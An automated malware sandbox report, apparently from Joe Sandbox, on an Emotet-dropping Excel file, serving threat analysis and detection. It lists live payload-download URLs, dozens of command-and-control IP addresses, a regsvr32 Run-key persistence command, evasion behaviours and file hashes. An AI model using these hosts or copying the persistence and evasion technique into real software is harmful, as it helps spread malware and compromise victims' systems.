                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 4470_02112022.xls | Initial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180009097 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_00000001800230F3 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006957 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008A56 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180005A82 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006415 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_00000001800224FA push ebp; ret
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008D61 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_000000018000658C push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008E30 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006633 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008F44 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: oxnv4.ooccxx.0.dr | Static PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: 40hd04O0[1].dll.0.drStatic PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XXKTOC\CASBb.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XXKTOC\CASBb.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file

Boot Survival

Source: C:\Windows\System32\regsvr32.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CASBb.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\oxnv4.ooccxx

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\XXKTOC\CASBb.dll:Zone.Identifier (read attributes | delete)
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10020690 IsWindowVisible,IsIconic,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10010AE4 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (7 identical entries)
Source: C:\Windows\System32\regsvr32.exe TID: 1228 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1212 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1700 | Thread sleep time: -60000s >= -30000s (2 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
Source: C:\Windows\System32\regsvr32.exe | API coverage: 2.8 %
Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
Source: regsvr32.exe, 00000008.00000002.941889396.00000000000FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10034370 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10034490 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10040590 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10039C90 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10039CC0 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1002FF40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 218.38.121.17 443
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA, (2 identical entries)
Source: C:\Windows\System32\regsvr32.exe | Code function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExA,RegQueryValueExA,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,LoadLibraryA,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesA, (2 identical entries)
Source: C:\Windows\System32\regsvr32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetUserDefaultLCID,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoA,GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1003F040 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,

Stealing of Sensitive Information

MITRE ATT&CK matrix (numbers in parentheses are the counts shown beside a technique on the original page):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting (2) | Registry Run Keys / Startup Folder (11) | Process Injection (111) | Masquerading (141) | Input Capture (1) | System Time Discovery (1) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (21) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder (11) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (121) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (14) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution (43) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (111) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (124) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories (1) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (2) | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Regsvr32 (1) | DCSync | System Information Discovery (26) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Behavior Graph (ID 746417; sample 4470_02112022.xls; start date 15/11/2022; architecture WINDOWS; score 100). Nodes shown on the page: EXCEL.EXE (contacts www.spinbalence.com, sat7ate.com and 4 other IPs or domains; drops C:\Users\user\oxnv4.ooccxx, C:\Users\user\AppData\...\40hd04O0[1].dll and C:\Users\user\Desktop\4470_02112022.xls; signatures "Document exploit detected (creates forbidden files)", "Document exploit detected (UrlDownloadToFile)") -> regsvr32.exe (drops C:\Windows\System32\XXKTOC\CASBb.dll (copy); signature "Hides that the sample has been downloaded from the Internet (zone.identifier)") -> regsvr32.exe (connects to 218.38.121.17 port 443, SKB-ASSKBroadbandCoLtdKR, Korea Republic of; signature "Creates an autostart registry key pointing to binary in C:\Windows"). Graph-level nodes: 103.224.241.74 (WEBWERKS-AS-INWebWerksIndiaPvtLtdIN, India), 210.57.209.142 (UNAIR-AS-IDUniversitasAirlanggaID, Indonesia), 43 other IPs or domains; a separately started regsvr32.exe carries the signature "System process connects to network (likely due to code injection or exploit)", and www.spinbalence.com the signature "Outdated Microsoft Office dropper detected".

Source | Detection | Scanner | Label
4470_02112022.xls | 81% | ReversingLabs | Document-Office.Trojan.Emotet
4470_02112022.xls | 68% | Virustotal |
4470_02112022.xls | 32% | Metadefender |
4470_02112022.xls | 100% | Avira | XF/Agent.B2

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | 81% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | 20% | Metadefender |
C:\Users\user\oxnv4.ooccxx | 81% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\oxnv4.ooccxx | 20% | Metadefender |
C:\Windows\System32\XXKTOC\CASBb.dll (copy) | 81% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\XXKTOC\CASBb.dll (copy) | 20% | Metadefender |

Source | Detection | Scanner | Label
10.2.regsvr32.exe.2b0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
9.2.regsvr32.exe.2c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
8.2.regsvr32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

Source | Detection | Scanner | Label
www.3d-stickers.com | 12% | Virustotal |
www.spinbalence.com | 12% | Virustotal |
navylin.com | 13% | Virustotal |
sat7ate.com | 14% | Virustotal |

Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://218.38.121.17/ | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://navylin.com/bsavxiv/axHQYKl/ | 22% | Virustotal |
https://www.3d-stickers.com/page-non-trouvee | 12% | Virustotal |
https://www.spinbalence.com/index.php?controller=404 | 10% | Virustotal |
https://www.3d-stickers.com/Content/Afa1PcRuxh/ | 0% | Avira URL Cloud | safe
https://www.spinbalence.com/Adapter/moycMR/ | 100% | Avira URL Cloud | malware
https://www.spinbalence.com/index.php?controller=404 | 100% | Avira URL Cloud | malware
http://navylin.com/bsavxiv/axHQYKl/ | 100% | Avira URL Cloud | malware
https://www.3d-stickers.com/page-non-trouvee | 100% | Avira URL Cloud | malware
http://www.spinbalence.com/Adapter/moycMR/ | 100% | Avira URL Cloud | malware
http://www.3d-stickers.com/Content/Afa1PcRuxh/ | 100% | Avira URL Cloud | malware
https://secure.comodo.coh | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.3d-stickers.com | 163.172.108.69 | true | false | | unknown
www.spinbalence.com | 163.172.115.127 | true | false | | unknown
navylin.com | 47.92.133.65 | true | false | | unknown
sat7ate.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://www.3d-stickers.com/Content/Afa1PcRuxh/ | true | Avira URL Cloud: safe | unknown
https://www.spinbalence.com/Adapter/moycMR/ | false | Avira URL Cloud: malware | unknown
https://www.spinbalence.com/index.php?controller=404 | false | 10% Virustotal; Avira URL Cloud: malware | unknown
https://218.38.121.17/ | true | URL Reputation: safe | unknown
http://navylin.com/bsavxiv/axHQYKl/ | false | 22% Virustotal; Avira URL Cloud: malware | unknown
https://www.3d-stickers.com/page-non-trouvee | true | 12% Virustotal; Avira URL Cloud: malware | unknown
http://www.spinbalence.com/Adapter/moycMR/ | false | Avira URL Cloud: malware | unknown
http://www.3d-stickers.com/Content/Afa1PcRuxh/ | true | Avira URL Cloud: malware | unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://ocsp.entrust.net03regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://secure.comodo.cohregsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net0Dregsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://secure.comodo.com/CPS0regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
Contacted public IPs (Country = geolocation of the IP; ASN Country = registration country of the ASN):

IP              | Domain               | Country           | ASN    | ASN Name                                                  | ASN Country | Malicious
188.165.79.151  | unknown              | France            | 16276  | OVH                                                       | FR          | true
196.44.98.190   | unknown              | Ghana             | 327814 | Ecoband                                                   | GH          | true
174.138.33.49   | unknown              | United States     | 14061  | DIGITALOCEAN-ASN                                          | US          | true
36.67.23.59     | unknown              | Indonesia         | 17974  | TELKOMNET-AS2-AP PT Telekomunikasi Indonesia              | ID          | true
103.41.204.169  | unknown              | Indonesia         | 58397  | INFINYS-AS-ID PT Infinys System Indonesia                 | ID          | true
85.214.67.203   | unknown              | Germany           | 6724   | STRATO STRATO AG                                          | DE          | true
83.229.80.93    | unknown              | United Kingdom    | 8513   | SKYVISION                                                 | GB          | true
198.199.70.22   | unknown              | United States     | 14061  | DIGITALOCEAN-ASN                                          | US          | true
93.104.209.107  | unknown              | Germany           | 8767   | MNET-AS Germany                                           | DE          | true
186.250.48.5    | unknown              | Brazil            | 262807 | Redfox Telecomunicacoes Ltda                              | BR          | true
175.126.176.79  | unknown              | Korea Republic of | 9523   | MOKWON-AS-KR Mokwon University                            | KR          | true
128.199.242.164 | unknown              | United Kingdom    | 14061  | DIGITALOCEAN-ASN                                          | US          | true
178.238.225.252 | unknown              | Germany           | 51167  | CONTABO                                                   | DE          | true
163.172.115.127 | www.spinbalence.com  | United Kingdom    | 12876  | Online SAS                                                | FR          | false
190.145.8.4     | unknown              | Colombia          | 14080  | Telmex Colombia SA                                        | CO          | true
46.101.98.60    | unknown              | Netherlands       | 14061  | DIGITALOCEAN-ASN                                          | US          | true
82.98.180.154   | unknown              | Spain             | 42612  | DINAHOSTING-AS                                            | ES          | true
103.71.99.57    | unknown              | India             | 135682 | AWDHPL-AS-IN Advika Web Developments Hosting Pvt Ltd      | IN          | true
87.106.97.83    | unknown              | Germany           | 8560   | ONEANDONE-AS Brauerstrasse 48                             | DE          | true
103.254.12.236  | unknown              | Viet Nam          | 56151  | DIGISTAR-VN DigiStar Company Limited                      | VN          | true
103.85.95.4     | unknown              | Indonesia         | 136077 | IDNIC-UNSRAT-AS-ID Universitas Islam Negeri Mataram       | ID          | true
202.134.4.210   | unknown              | Indonesia         | 7713   | TELKOMNET-AS-AP PT Telekomunikasi Indonesia               | ID          | true
165.22.254.236  | unknown              | United States     | 14061  | DIGITALOCEAN-ASN                                          | US          | true
78.47.204.80    | unknown              | Germany           | 24940  | HETZNER-AS                                                | DE          | true
118.98.72.86    | unknown              | Indonesia         | 7713   | TELKOMNET-AS-AP PT Telekomunikasi Indonesia               | ID          | true
139.59.80.108   | unknown              | Singapore         | 14061  | DIGITALOCEAN-ASN                                          | US          | true
104.244.79.94   | unknown              | United States     | 53667  | PONYNET                                                   | US          | true
37.44.244.177   | unknown              | Germany           | 47583  | AS-HOSTINGER                                              | LT          | true
51.75.33.122    | unknown              | France            | 16276  | OVH                                                       | FR          | true
47.92.133.65    | navylin.com          | China             | 37963  | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd |             | false
160.16.143.191  | unknown              | Japan             | 9370   | SAKURA-B SAKURA Internet Inc                              | JP          | true
103.56.149.105  | unknown              | Indonesia         | 55688  | BEON-AS-ID PT Beon Intermedia                             | ID          | true
85.25.120.45    | unknown              | Germany           | 8972   | GD-EMEA-DC-SXB1                                           | DE          | true
139.196.72.155  | unknown              | China             | 37963  | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd |             | true
103.126.216.86  | unknown              | Bangladesh        | 138482 | SKYVIEW-AS-AP SKYVIEW ONLINE LTD                          | BD          | true
128.199.217.206 | unknown              | United Kingdom    | 14061  | DIGITALOCEAN-ASN                                          | US          | true
114.79.130.68   | unknown              | India             | 45769  | DVOIS-IN D-Vois Broadband Pvt Ltd                         | IN          | true
103.224.241.74  | unknown              | India             | 133296 | WEBWERKS-AS-IN Web Werks India Pvt Ltd                    | IN          | true
210.57.209.142  | unknown              | Indonesia         | 38142  | UNAIR-AS-ID Universitas Airlangga                         | ID          | true
202.28.34.99    | unknown              | Thailand          | 9562   | MSU-TH-AP Mahasarakham University                         | TH          | true
80.211.107.116  | unknown              | Italy             | 31034  | ARUBA-ASN                                                 | IT          | true
54.37.228.122   | unknown              | France            | 16276  | OVH                                                       | FR          | true
163.172.108.69  | www.3d-stickers.com  | United Kingdom    | 12876  | Online SAS                                                | FR          | false
218.38.121.17   | unknown              | Korea Republic of | 9318   | SKB-AS SK Broadband Co Ltd                                | KR          | true
185.148.169.10  | unknown              | Germany           | 44780  | EVERSCALE-AS                                              | DE          | true
195.77.239.39   | unknown              | Spain             | 60493  | FICOSA-AS                                                 | ES          | true
178.62.112.199  | unknown              | European Union    | 14061  | DIGITALOCEAN-ASN                                          | US          | true
62.171.178.147  | unknown              | United Kingdom    | 51167  | CONTABO                                                   | DE          | true
64.227.55.231   | unknown              | United States     | 14061  | DIGITALOCEAN-ASN                                          | US          | true

The two "false" rows with a resolved domain (www.spinbalence.com, www.3d-stickers.com) are the payload download hosts from the macro; the remaining rows, all flagged malicious, are the C2 addresses from the Emotet configuration.
Private-range IP: 192.168.2.255
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:746417
                            Start date and time:2022-11-15 12:42:46 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 23s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:4470_02112022.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@12/10@4/50
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 79.5% (good quality ratio 69.4%)
                            • Quality average: 70.7%
                            • Quality standard deviation: 34%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Found warning dialog
                            • Click Ok
                            • Found warning dialog
                            • Click Ok
                            • Found warning dialog
                            • Click Ok
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                            • TCP Packets have been reduced to 100
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtQueryValueKey calls found.
Time     | Type            | Description
12:43:36 | API Interceptor | 5x Sleep call for process: regsvr32.exe modified
12:44:20 | Autostart       | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run CASBb.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
